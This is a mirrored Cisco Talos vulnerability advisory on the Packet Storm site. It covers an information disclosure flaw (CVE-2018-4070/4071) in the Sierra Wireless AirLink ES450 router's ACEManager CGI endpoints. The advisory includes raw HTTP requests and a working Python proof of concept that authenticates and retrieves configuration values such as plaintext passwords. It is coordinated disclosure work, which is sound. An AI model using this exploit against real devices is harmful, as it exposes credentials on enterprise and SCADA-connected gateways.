what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Sierra Wireless AirLink ES450 ACEManager Embedded_Ace_Get_Task.cgi Information Disclosure

Sierra Wireless AirLink ES450 ACEManager Embedded_Ace_Get_Task.cgi Information Disclosure
Posted Apr 26, 2019
Authored by Cisco Talos, Jared Rittle, Carl Hurd | Site talosintelligence.com

An exploitable Information Disclosure vulnerability exists in the ACEManager EmbeddedAceGet_Task.cgi functionality of Sierra Wireless AirLink ES450 FW 4.9.3. A specially crafted HTTP request can cause an information disclosure, resulting in the exposure of confidential information, including, but not limited to, plaintext passwords and SNMP community strings. An attacker can make an authenticated HTTP request, or run the binary, to trigger this vulnerability.

tags | exploit, web, cgi, info disclosure
advisories | CVE-2018-4070, CVE-2018-4071
SHA-256 | f3e9e439a12b70a96bfeb02d461beccb29bf0fda4eae49519ccb97a1479c0998

Sierra Wireless AirLink ES450 ACEManager Embedded_Ace_Get_Task.cgi Information Disclosure

Change Mirror Download
Talos Vulnerability Report

TALOS-2018-0755

Sierra Wireless AirLink ES450 ACEManager Embedded_Ace_Get_Task.cgi Information Disclosure Vulnerability
April 25, 2019

CVE Number

CVE-2018-4070, CVE-2018-4071

Summary

An exploitable Information Disclosure vulnerability exists in the ACEManager EmbeddedAceGet_Task.cgi functionality of Sierra Wireless AirLink ES450 FW 4.9.3. A specially crafted HTTP request can cause an information disclosure, resulting in the exposure of confidential information, including, but not limited to, plaintext passwords and SNMP community strings. An attacker can make an authenticated HTTP request, or run the binary, to trigger this vulnerability.

Tested Versions

Sierra Wireless AirLink ES450 FW 4.9.3

Product URLs

https://www.sierrawireless.com/products-and-solutions/routers-gateways/es450/
CVSSv3 Score

7.7 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
CWE

CWE-200: Information Exposure

Details

Sierra Wireless is a wireless communications equipement designer and manufacturer. They provide both embedded solutions as well as wireless hardware solutions, including both the ES450 and GX450 devices. The AirLink ES450 is a LTE gateway designed for distributed enterprise. The ES450 is typically seen connecting Point-of-sale devices, remote SCADA equipment, or other business critical equipment. The AirLink ES450 also provides a terminal server for remote out-of-band administration.

ACEManager is the web server included with the AirLink ES450. This web server is responsible for the majority of interactions in the device. Some specific capabilities of the web server are routing, device reconfiguration, user authentication and certificate management. The vendor has stated that the ACEManager web application is not accessible by default from the Cellular WAN.

These vulnerabilities were discovered and tested using the AirLink ES450. Most likely this vulnerabilities also affects the AirLink GX450 product as well.
CVE-2018-4070

The EmbeddedAceGet_Task.cgi executable is used to retrieve MSCII configuration values within the configuration manager of the AirLink ES450. This binary does not have any restricted configuration settings, so once the MSCIID is discovered, any authenticated user can send configuration changes using the /cgi-bin/Embedded_Ace_Get_Task.cgi endpoint. The following request shows the MSCIID for retrieving the user password for the device in plaintext.

POST /cgi-bin/Embedded_Ace_Get_Task.cgi HTTP/1.1
Host: 192.168.13.31:9191
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50215)
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.13.31:9191/admin/ACEmanagerX.html
Content-Type: text/xml
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Length: 4
Cookie: token=fd57b4e137a8f9fe1a3c998fc25b0e1e
Connection: close

5003

This binary has -rwxr-xr-x permissions which allows the binary to be executed outside of the web user interface as well, such as if a user logs in over SSH. This allows a low-privilege user to retrieve the password of other users on the system, status of services, and retrieve any other configuration on the device.
CVE-2018-4071

The EmbeddedAceTLGet_Task.cgi executable is used to retrieve MSCII configuration values within the configuration manager of the AirLink ES450. This binary does not have any restricted configuration settings, so once the MSCIID is discovered, any authenticated user can send configuration changes using the /cgi-bin/Embedded_Ace_TLGet_Task.cgi endpoint. The following request shows the MSCIID for retrieving the user password for the device in plaintext.

POST /cgi-bin/Embedded_Ace_TLGet_Task.cgi HTTP/1.1
Host: 192.168.13.31:9191
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50215)
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.13.31:9191/admin/ACEmanagerX.html
Content-Type: text/xml
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Length: 18
Cookie: token=fd57b4e137a8f9fe1a3c998fc25b0e1e
Connection: close

rows=1&colsid=5003

This binary has -rwxr-xr-x permissions which allows the binary to be executed outside of the web user interface as well, such as if a user logs in over SSH. This allows a low-privilege user to retrieve the password of other users on the system, status of services, and retrieve any other configuration on the device.

Exploit Proof of Concept

#!/usr/bin/env python
#Author : Carl Hurd, Cisco Talos
import sys
import requests

def auth(ip, port, password):
data = """<request xmlns="urn:acemanager">
<connect>
<login>user</login>
<password><![CDATA[{}]]></password>
</connect>
</request>""".format(password)

response = requests.post("http://"+ip+":"+port+"/xml/Connect.xml", data=data)

try:
cookies = dict(token=response.headers["Set-Cookie"].split("; ")[0][len("token="):])
return cookies
except:
print("Error while authenticating")
sys.exit(0)

def main():
if len(sys.argv) < 5 or len(sys.argv) > 5:
print("Usage : {} [ip address] [port] [password of user] [msciid to get]".format(sys.argv[0]))
sys.exit(0)

ip = sys.argv[1]
port = sys.argv[2]
password = sys.argv[3]
msciid = sys.argv[4]

print("MSCIID : {}\n".format(msciid))

cookies = auth(ip, port, password)

data = msciid
response = requests.post("http://"+ip+":"+port+"/cgi-bin/Embedded_Ace_Get_Task.cgi", cookies=cookies, data=data)

print(response.text)

if __name__ == "__main__":
main()

Timeline

2018-12-14 - Vendor disclosure
2018-12-17 - Vendor acknowledged
2019-01-08 - Discussion to review vendor's analysis of issues
2019-03-26 - Vendor established timelines for fix/public disclosure
2019-04-20 - Talos provided revised CVSS score on TALOS-2018-0746, TALOS-2018-0751, TALOS-2018-0752, TALOS-2018-0755, and TALOS-2018-0756
2019-04-25 - Public Release

Credit

Discovered by Carl Hurd and Jared Rittle of Cisco Talos.
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close